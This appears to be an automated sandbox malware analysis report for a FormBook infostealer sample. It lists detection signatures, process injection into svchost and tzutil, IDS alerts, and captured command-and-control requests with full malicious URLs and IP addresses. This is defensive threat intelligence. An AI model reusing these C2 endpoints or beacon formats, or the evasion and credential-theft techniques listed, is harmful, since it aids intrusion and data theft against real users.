Edit tour

Windows Analysis Report
gKvjKMCUfq.exe

Overview

General Information

Sample name:	gKvjKMCUfq.exe renamed because original name is a hash value
Original sample name:	f44c7d27b817a384705c841bc8baa0f14e2771f98711c68079f70980d5ef3362.exe
Analysis ID:	1588124
MD5:	71732f96d8fccdf3373ab6e417df3cf9
SHA1:	4cb493ca381c59b0d2609ca5f18b3800e09b3c7d
SHA256:	f44c7d27b817a384705c841bc8baa0f14e2771f98711c68079f70980d5ef3362
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

gKvjKMCUfq.exe (PID: 180 cmdline: "C:\Users\user\Desktop\gKvjKMCUfq.exe" MD5: 71732F96D8FCCDF3373AB6E417DF3CF9)

svchost.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\gKvjKMCUfq.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

SUMCVKBWRXks.exe (PID: 3716 cmdline: "C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

tzutil.exe (PID: 4020 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)

firefox.exe (PID: 5948 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3552001637.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3553295403.0000000003390000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2211380258.00000000071D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2208574163.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3553008112.0000000001220000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3553656900.0000000003760000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3553342363.00000000033E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2207975108.0000000002600000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.2600000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.2600000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\gKvjKMCUfq.exe", CommandLine: "C:\Users\user\Desktop\gKvjKMCUfq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gKvjKMCUfq.exe", ParentImage: C:\Users\user\Desktop\gKvjKMCUfq.exe, ParentProcessId: 180, ParentProcessName: gKvjKMCUfq.exe, ProcessCommandLine: "C:\Users\user\Desktop\gKvjKMCUfq.exe", ProcessId: 6784, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\gKvjKMCUfq.exe", CommandLine: "C:\Users\user\Desktop\gKvjKMCUfq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gKvjKMCUfq.exe", ParentImage: C:\Users\user\Desktop\gKvjKMCUfq.exe, ParentProcessId: 180, ParentProcessName: gKvjKMCUfq.exe, ProcessCommandLine: "C:\Users\user\Desktop\gKvjKMCUfq.exe", ProcessId: 6784, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:46:35.150253+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49880	217.160.0.113	80	TCP
2025-01-10T21:46:37.703873+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49900	217.160.0.113	80	TCP
2025-01-10T21:46:40.343268+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49914	217.160.0.113	80	TCP
2025-01-10T21:46:58.148004+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50010	154.205.156.26	80	TCP
2025-01-10T21:47:00.712936+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50011	154.205.156.26	80	TCP
2025-01-10T21:47:03.258390+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50012	154.205.156.26	80	TCP
2025-01-10T21:47:12.719409+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50014	38.181.21.178	80	TCP
2025-01-10T21:47:15.269772+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50015	38.181.21.178	80	TCP
2025-01-10T21:47:17.954980+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50016	38.181.21.178	80	TCP
2025-01-10T21:47:34.628077+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50018	23.167.152.41	80	TCP
2025-01-10T21:47:37.178595+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50019	23.167.152.41	80	TCP
2025-01-10T21:47:39.857639+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50020	23.167.152.41	80	TCP
2025-01-10T21:47:49.357923+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50022	103.75.185.22	80	TCP
2025-01-10T21:47:52.018957+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50023	103.75.185.22	80	TCP
2025-01-10T21:47:54.622992+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50024	103.75.185.22	80	TCP
2025-01-10T21:48:03.104648+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50026	162.0.213.94	80	TCP
2025-01-10T21:48:05.478751+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50027	162.0.213.94	80	TCP
2025-01-10T21:48:08.261858+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50028	162.0.213.94	80	TCP
2025-01-10T21:48:16.347186+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50030	161.97.142.144	80	TCP
2025-01-10T21:48:19.461296+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50031	161.97.142.144	80	TCP
2025-01-10T21:48:22.688279+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50032	161.97.142.144	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.44ynh.top/l9wb/	Avira URL Cloud: Label: malware
Source: http://www.44ynh.top/l9wb/?Q4DT=n4tTOrYxhN7&blO4h0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: gKvjKMCUfq.exe	Virustotal: Detection: 69%			Perma Link
Source: gKvjKMCUfq.exe	ReversingLabs: Detection: 76%

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3552001637.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3553295403.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2211380258.00000000071D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2208574163.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553008112.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553656900.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3553342363.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2207975108.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: gKvjKMCUfq.exe

Joe Sandbox ML: detected

Source: gKvjKMCUfq.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: tzutil.pdbGCTL source: svchost.exe, 00000001.00000003.2176788289.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2176703777.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, SUMCVKBWRXks.exe, 00000005.00000003.2280928532.000000000106F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SUMCVKBWRXks.exe, 00000005.00000000.2131829694.000000000082E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: gKvjKMCUfq.exe, 00000000.00000003.1718984241.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, gKvjKMCUfq.exe, 00000000.00000003.1719658891.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2115438341.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2208201359.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2208201359.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2117314744.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553514765.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2208256467.000000000326C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553514765.000000000375E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2210561804.0000000003415000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: gKvjKMCUfq.exe, 00000000.00000003.1718984241.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, gKvjKMCUfq.exe, 00000000.00000003.1719658891.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2115438341.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2208201359.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2208201359.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2117314744.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553514765.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2208256467.000000000326C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553514765.000000000375E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2210561804.0000000003415000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: SUMCVKBWRXks.exe, 00000005.00000002.3556655023.000000000567C000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553914262.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3552198154.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2504404477.0000000020F0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: SUMCVKBWRXks.exe, 00000005.00000002.3556655023.000000000567C000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553914262.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3552198154.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2504404477.0000000020F0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: tzutil.pdb source: svchost.exe, 00000001.00000003.2176788289.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2176703777.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, SUMCVKBWRXks.exe, 00000005.00000003.2280928532.000000000106F000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007D445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_007D445A
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DC6D1 FindFirstFileW,FindClose,	0_2_007DC6D1
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_007DC75C
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007DEF95
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007DF0F2
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007DF3F3
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007D37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007D37EF
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007D3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007D3B12
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007DBCBC

Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 4x nop then xor eax, eax	5_2_0124C51A
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 4x nop then pop edi	5_2_01248CC0
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 4x nop then pop edi	5_2_0124865A

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49880 -> 217.160.0.113:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49900 -> 217.160.0.113:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49914 -> 217.160.0.113:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 38.181.21.178:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 23.167.152.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50010 -> 154.205.156.26:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 38.181.21.178:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 103.75.185.22:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 103.75.185.22:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 103.75.185.22:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 23.167.152.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 23.167.152.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 154.205.156.26:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 162.0.213.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 154.205.156.26:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 38.181.21.178:80

Source: Joe Sandbox View

IP Address: 162.0.213.94 162.0.213.94

Source: Joe Sandbox View

ASN Name: ACPCA ACPCA

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007E22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_007E22EE

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Fri, 10 Jan 2025 20:46:57 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Fri, 10 Jan 2025 20:47:00 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Fri, 10 Jan 2025 20:47:02 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g

Source: global traffic	HTTP traffic detected: GET /q3v1/?Q4DT=n4tTOrYxhN7&blO4h0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs= HTTP/1.1Host: www.supernutra01.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic	HTTP traffic detected: GET /m5si/?blO4h0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&Q4DT=n4tTOrYxhN7 HTTP/1.1Host: www.prestigerugz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic	HTTP traffic detected: GET /521z/?blO4h0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&Q4DT=n4tTOrYxhN7 HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic	HTTP traffic detected: GET /l9wb/?Q4DT=n4tTOrYxhN7&blO4h0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0= HTTP/1.1Host: www.44ynh.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic	HTTP traffic detected: GET /q34f/?Q4DT=n4tTOrYxhN7&blO4h0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58= HTTP/1.1Host: www.75178.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic	HTTP traffic detected: GET /syud/?blO4h0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&Q4DT=n4tTOrYxhN7 HTTP/1.1Host: www.taxitayninh365.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic	HTTP traffic detected: GET /wr6c/?Q4DT=n4tTOrYxhN7&blO4h0=P2ZEIELZ0UPa04kWkm8Oh6lziqPRzY9FlTIQAlVGqe01bp+GVEKkI1C60uSAlmlZ1ff3ZHYqpSh2Ykr2aNLl88FB/CXa3uNADngpIC+4Qo6DpYBhb1F8NR4= HTTP/1.1Host: www.ontherise.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0

Source: global traffic	DNS traffic detected: DNS query: www.supernutra01.online
Source: global traffic	DNS traffic detected: DNS query: www.prestigerugz.info
